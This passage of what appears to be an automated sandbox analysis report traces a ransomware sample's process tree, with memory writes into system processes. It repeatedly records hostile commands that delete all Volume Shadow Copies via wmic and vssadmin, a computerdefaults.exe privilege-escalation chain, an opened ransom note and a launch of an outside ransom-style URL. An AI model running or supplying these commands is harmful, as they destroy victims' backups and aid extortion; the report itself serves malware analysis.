PID 1076 wrote to memory of 4540	1076	RuntimeBroker.exe	275
PID 1076 wrote to memory of 3828	1076	RuntimeBroker.exe	106
PID 1076 wrote to memory of 3828	1076	RuntimeBroker.exe	106
PID 1076 wrote to memory of 4016	1076	RuntimeBroker.exe	263
PID 1076 wrote to memory of 4016	1076	RuntimeBroker.exe	263
PID 376 wrote to memory of 4124	376	rundll32.exe	306
PID 376 wrote to memory of 4124	376	rundll32.exe	306
PID 376 wrote to memory of 756	376	rundll32.exe	352
PID 376 wrote to memory of 756	376	rundll32.exe	352
PID 376 wrote to memory of 4460	376	rundll32.exe	114
PID 376 wrote to memory of 4460	376	rundll32.exe	114
PID 2508 wrote to memory of 1796	2508	taskhostw.exe	118
PID 2508 wrote to memory of 1796	2508	taskhostw.exe	118
PID 2508 wrote to memory of 3928	2508	taskhostw.exe	433
PID 2508 wrote to memory of 3928	2508	taskhostw.exe	433
PID 2508 wrote to memory of 232	2508	taskhostw.exe	120
PID 2508 wrote to memory of 232	2508	taskhostw.exe	120
PID 3828 wrote to memory of 740	3828	cmd.exe	163
PID 3828 wrote to memory of 740	3828	cmd.exe	163
PID 4016 wrote to memory of 4584	4016	cmd.exe	125
PID 4016 wrote to memory of 4584	4016	cmd.exe	125
PID 756 wrote to memory of 3232	756	cmd.exe	167
PID 756 wrote to memory of 3232	756	cmd.exe	167
PID 3928 wrote to memory of 1376	3928	cmd.exe	127
PID 3928 wrote to memory of 1376	3928	cmd.exe	127
PID 4460 wrote to memory of 5128	4460	cmd.exe	128
PID 4460 wrote to memory of 5128	4460	cmd.exe	128
PID 232 wrote to memory of 5180	232	cmd.exe	129
PID 232 wrote to memory of 5180	232	cmd.exe	129
PID 4708 wrote to memory of 5740	4708	TextInputHost.exe	149
PID 4708 wrote to memory of 5740	4708	TextInputHost.exe	149
PID 4708 wrote to memory of 5740	4708	TextInputHost.exe	149
PID 3896 wrote to memory of 5756	3896	cmd.exe	150
PID 3896 wrote to memory of 5756	3896	cmd.exe	150
PID 4708 wrote to memory of 5952	4708	TextInputHost.exe	153
PID 4708 wrote to memory of 5952	4708	TextInputHost.exe	153
PID 4708 wrote to memory of 5952	4708	TextInputHost.exe	153
PID 4708 wrote to memory of 5980	4708	TextInputHost.exe	390
PID 4708 wrote to memory of 5980	4708	TextInputHost.exe	390
PID 4708 wrote to memory of 5980	4708	TextInputHost.exe	390
PID 5368 wrote to memory of 6028	5368	cmd.exe	157
PID 5368 wrote to memory of 6028	5368	cmd.exe	157
PID 5408 wrote to memory of 6120	5408	cmd.exe	159
PID 5408 wrote to memory of 6120	5408	cmd.exe	159
PID 5384 wrote to memory of 5488	5384	cmd.exe	160
PID 5384 wrote to memory of 5488	5384	cmd.exe	160
PID 5392 wrote to memory of 3308	5392	cmd.exe	255
PID 5392 wrote to memory of 3308	5392	cmd.exe	255
PID 684 wrote to memory of 3892	684	msedge.exe	162
PID 684 wrote to memory of 3892	684	msedge.exe	162
PID 684 wrote to memory of 3892	684	msedge.exe	162
PID 684 wrote to memory of 3892	684	msedge.exe	162
PID 684 wrote to memory of 3892	684	msedge.exe	162
PID 684 wrote to memory of 3892	684	msedge.exe	162
PID 684 wrote to memory of 3892	684	msedge.exe	162
PID 684 wrote to memory of 3892	684	msedge.exe	162
PID 684 wrote to memory of 3892	684	msedge.exe	162
PID 684 wrote to memory of 3892	684	msedge.exe	162
PID 684 wrote to memory of 3892	684	msedge.exe	162

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2396
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5996
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:756
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:2964
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5844
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1812
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5720
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5284

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
PID:2404
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5844
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5772
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:6040
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:6032
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5828

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:2508
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:1796
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3928
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1376
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:232
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5180

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3300
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\bfa86847c33dfb1ece4323369a271f7a.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:376
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4124
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:756
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:3232
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4460
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:5128
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:4388
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:6032
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2896
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4576
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
- Modifies registry class
PID:3696
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:3908
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5236
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4736
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1996
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2596

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3892

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:4036
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:304
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1996
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5480
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3928
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3324

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1076
- C:\Windows\System32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:4964
- C:\Windows\System32\cmd.exe
  cmd /c "start http://f8ec869032e4d8102agenhtaat.datause.monster/genhtaat^&2^&32293843^&85^&343^&2219041"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3896
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://f8ec869032e4d8102agenhtaat.datause.monster/genhtaat&2&32293843&85&343&2219041
    3⤵
    PID:5756
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4540
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3828
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:740
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4016
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4584

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:3416

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:4164
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:3544
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5724
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5916
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5568
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3608

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:4648
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5532
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5800
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1600
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5508
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5308

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4708
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5740
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5952
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5980

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:4508
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:1856
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1116
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:896
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3856
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x2f4,0x7ffd3b3c2e98,0x7ffd3b3c2ea4,0x7ffd3b3c2eb0
  2⤵
  - Checks processor information in registry
  - Enumerates system info in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:2496
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3512
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:5544
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:4824
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:5852
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2276 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:2
  2⤵
  PID:2280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3220 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:3
  2⤵
  PID:408
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5956
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:1480
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5812
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:1812
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:2560
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:2120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3480 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:3436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --mojo-platform-channel-handle=5312 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:1
  2⤵
  PID:2524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --mojo-platform-channel-handle=5324 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:1
  2⤵
  - Drops file in Program Files directory
  PID:4288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=752 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:1
  2⤵
  PID:3892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=4220 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:1
  2⤵
  PID:740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4684 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:4812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=3428 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:1
  2⤵
  PID:4184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=5888 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:1
  2⤵
  PID:5168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=5996 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:1
  2⤵
  PID:5864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=6136 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:4508
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5872
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4752
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5896
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1708
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --mojo-platform-channel-handle=5956 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:1
  2⤵
  PID:5512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --mojo-platform-channel-handle=5920 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:1
  2⤵
  PID:5652

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca
1⤵
PID:4688

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX53ypgrj20bgndg05hj3tc7z654myszwp.mca
1⤵
PID:3708

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
- Checks processor information in registry
- Modifies registry class
PID:4572
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:3580
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:756
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4684

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:5368
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:6028
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3656

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5376
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5236
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3324

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:5384
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5488
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4548

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:5392
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3308
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2104

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5400
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2560
- - C:\Windows\system32\wbem\wmic.exe
